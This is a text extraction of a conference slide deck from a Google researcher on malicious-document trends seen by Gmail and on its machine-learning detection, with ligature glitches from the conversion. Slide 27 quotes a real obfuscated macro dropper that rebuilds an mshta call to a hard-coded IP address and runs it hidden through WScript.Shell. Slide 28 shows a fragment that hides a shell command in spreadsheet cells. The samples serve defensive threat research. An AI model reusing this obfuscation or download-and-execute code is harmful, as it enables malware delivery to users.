malicious documents trends a gmail perspective
play

Malicious Documents Trends: a Gmail Perspective Google, @elie with - PowerPoint PPT Presentation

SESSION ID: HTA-T10 Malicious Documents Trends: a Gmail Perspective Google, @elie with the help of many Googlers Slides available here: htups://elie.net/rsa20 In Oct 2019 the Russian sponsored APT group Primitive Bear used obfuscated


  1. SESSION ID: HTA-T10 Malicious Documents Trends: a Gmail Perspective Google, @elie with the help of many Googlers

  2. Slides available here: htups://elie.net/rsa20

  3. In Oct 2019 the Russian sponsored APT group Primitive Bear used obfuscated offjce documents to target Ukrainian entities htups://www.anomali.com/fjles/white-papers/Anomali_Threat_Research-Gamaredon_TTPs_Target_Ukraine-WP.pdf

  4. PDF: 2% Offjce: 56% Malicious Documents represent a signifjcant paru of malware targeting our users

  5. Every week Gmail scan over 300B+ atuachments for malware

  6. Each second we need to process millions of documents in a matuer of milliseconds

  7. How Gmail malware detection works Policy Scanners Decision engine engine

  8. How Gmail malware detection works Policy Scanners Decision engine engine

  9. How Gmail malware detection works Policy Scanners Decision engine engine

  10. How Gmail malware detection works Policy Scanners Decision engine engine

  11. How about users and organization at risk of targeted atuack?

  12. Security Sandboxes are used to supplement detection when need.

  13. Agenda Who is targeted by malicious documents? Deconstructing malicious documents campaigns Insights into Gmail next-gen detection

  14. Who is targeted by malicious documents?

  15. Non for Education Company Government profjt Every type of organization is at risk of being targeted by malicious documents

  16. Education Company Non for profjt Government Some organizations are more targeted by malicious documents than others

  17. Education Finance & Insurance Health Care IT Wholesale Trade Retail Real Estate Manufacturing Utilities Transporuation Some industries are more targeted by malicious documents than others

  18. Indonesia Russia Germany India Japan France USA Finland Great Britain Norway Prevalence of malicious documents varies drastically from country to country

  19. Deconstructing malicious documents campaigns

  20. Cats through the ages 2000 BCE 1200 CE 1800 CE 2020 CE

  21. 63% of the malicious docs blocked by Gmail are difgerent from day to day

  22. The volume of malicious document greatly varies from day to day: 3x variation is the normal

  23. Locky ransomware Botnets are the culprits behind some of the massive bursts of malicious emails we observe. Necurs alone was sending 100M locky samples per day in 2016

  24. The malicious document threat landscape is very fast-paced and extremely adversarial

  25. Kits ofgering weaponized document exploits packed with AV evasion techniques are routinely available on the blackmarket as SaaS for $400-$5000 https://news.sophos.com/en-us/2019/02/14/old-phantom-crypter-upends-malicious-document-tools/?cmp=30728

  26. What techniques do those kits use?

  27. boazuda = "zTpVrQQvHdVZWEzNCEvrDXMHhcjFYVxXIEEnuDCLMqpbjXqYf hcjFYVxXIEEnucjFYVxXIEEnup://104.144.207.201/cjFYVxXIEEnuron/WEzNCEvrDXMHcjFYVxXIEEnuiELOZqbR QzjYzTpVrQQvHdVZ.php?ucjFYVxXIEEnuzTpVrQQvHdVZDCLMqpbjXqYf=DCLMqpbjXqYfrniELOZqbRQzjY" boazuda = Replace(boazuda, "zTpVrQQvHdVZ", "m") boazuda = Replace(boazuda, "DCLMqpbjXqYf", "a") dzkkGwK = "X" & "p" & "o" Mshta boazuda = Replace(boazuda, "WEzNCEvrDXMH", "s") http://104.144.xxx.yyy/tron/stem.php AuOKypAOxXWC = "u" & "x" & Trim("G") LrdizVw = 1418 + 1239 + 1546 + 521 + 1029 iBEFgGzg = 1766 + 1267 + 544 + 1840 boazuda = Replace(boazuda, "cjFYVxXIEEnu", "t") boazuda = Replace(boazuda, "iELOZqbRQzjY", "e") cYqOLzNGqSzN = 110 + 662 + 271 + 430 + 1818 IzdiuFFLcOWX = 1234 - 1771 - 1644 - 1187 boazuda = Replace(boazuda, "dfnAfNznHxFV", "l") yCdrQfLG = "Z" & "y" & Trim("R") & "d" loquaz = "WScripUEAOXJSPZOCg.ShwBfuroncKuUbkjJbOBuEpdFEkjJbOBuEpdFE" loquaz = Replace(loquaz, "DgDdPEVxFMkH", "m") OFNCRKqKF = 1006 + 15 + 215 loquaz = Replace(loquaz, "rTRMGUvpLYHv", "a") TOxTXxovMuOp = 734 + 33 + 1188 + 563 + 716 loquaz = Replace(loquaz, "AdoqkZxrLcFX", "s") loquaz = Replace(loquaz, "UEAOXJSPZOCg", "t") WScript.shell QFMdIPpUYY = 459 - 943 - 977 AUvwcPXcwXb = "E" & "Q" loquaz = Replace(loquaz, "wBfuroncKuUb", "e") iqEyuLuf = "D" & "A" & Trim("O") loquaz = Replace(loquaz, "kjJbOBuEpdFE", "l") uRxRWUfRpSX = Trim("G") & "k" & Trim("G") & Trim("I") jXkIrzM = 128 - 1507 - 70 XjnfDLLd = Trim("k") & "o" & "p" CreateObject(loquaz).Run boazuda, 0 FAcDNuSZHuWp = 1892 - 994 - 435 - 958 - 491 - 1652 - 1245 NbnCVgoojDpO = 1069 + 1656 + 957 + 714 CDDQFoi = 512 + 1320 zCwcBZPYSpI = 1011 - 1218 - 830 - 1495 - 300 - 1268 - 860

  28. Atuackers try to evade q = "": m = "" detection by adding For i = use * 2 To use * 2 + 3 q = q + plumb(Cells(i, use * 2)): m = m + malware in XLS cell plumb(Cells(i + use / 2, use * 2)) Next i content. Shell q + cop(use, use) + m, ..

  29. Takeaways Obfuscator and 63% of malware are weaponized exploits difgerent from day to day are readily available

  30. Insights into Gmail next-gen malicious document detection

  31. Use AI to improve detection

  32. Really?

  33. Enhance existing detection capabilities with AI interpolation & advanced document analyzers to coverage and to adversarial atuacks

  34. Gmail detection landscape: today APT / 0day Advanced Defense obfuscation GAP / opporuunity Bulk malware Detection TCO

  35. Gmail detection landscape: tomorrow APT / 0day AI Advanced obfuscation Bulk malware Detection TCO

  36. How does it work in practice?

  37. Anatomy of a document scanner Feature Document extractors analyzer Macro AST Supervised Transpiler Machine Learning Macro/script Analyzer Execution Parsers Feedback loop for dynamic code (eval)

  38. How our AI scanner integrate with Gmail malware detection works Policy Scanners Decision engine engine

  39. Does it really work?

  40. AI only Both Other scanners only 200% 150% 100% 50% 0% Jan Jan Jan Jan Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb 28 29 30 31 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 AI scanner increases Offjce documents with malicious documents detection by ~10% consistently and 150+% at peak

  41. 14.5% 10.5% Improvement varies by fjletype

  42. How do you build ground truth?

  43. No silver bullet: use a multi prong approach Hindsights samples Re-scan documents at a later stage to give a chance to re-evaluation various scanners to have their false positives fixed Additional sandbox Scan suspicious and a large subset of documents with scans sandboxes for additional verdicts Leverage deep-clustering to quickly identify the samples Cluster analysis that need to be reviewed to find potential FP / FN

  44. Deep-clustering to scale model improvements Example of a incorrect extrapolation - .dll in code was considered malicious

  45. Takeaways Malicious documents Adversary continuously Robust malicious is a key threat to shifu their TTP and documents detection businesses and end tweak their payload to requires a defense in users avoid detection depth strategy that combine detection approaches

  46. Robust malicious documents detection requires combining technologies and constant R&D htups://elie.net/rsa20

  47. Thank you

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend


More recommend